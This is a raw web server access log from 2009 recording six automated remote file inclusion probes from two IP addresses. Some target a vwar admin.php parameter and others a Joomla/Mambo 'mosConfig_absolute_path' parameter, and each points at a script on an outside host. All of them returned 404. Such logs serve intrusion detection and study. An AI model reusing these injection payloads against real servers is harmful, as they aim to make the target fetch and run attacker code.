87.106.210.178 - - [26/Jul/2009:00:57:37 -0400] "GET /logs/error_log.Q109060200%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
87.106.210.178 - - [26/Jul/2009:00:58:34 -0400] "GET /logs/access_log.Q109050900%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
87.106.210.178 - - [26/Jul/2009:00:58:34 -0400] "GET /logs/error_log.Q109050900%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
87.106.210.178 - - [26/Jul/2009:00:59:05 -0400] "GET /logs/access_log.Q109053000%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
91.191.35.118 - - [26/Jul/2009:00:59:19 -0400] "GET /logs/access_log.Q109053100/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
91.191.35.118 - - [26/Jul/2009:00:59:19 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
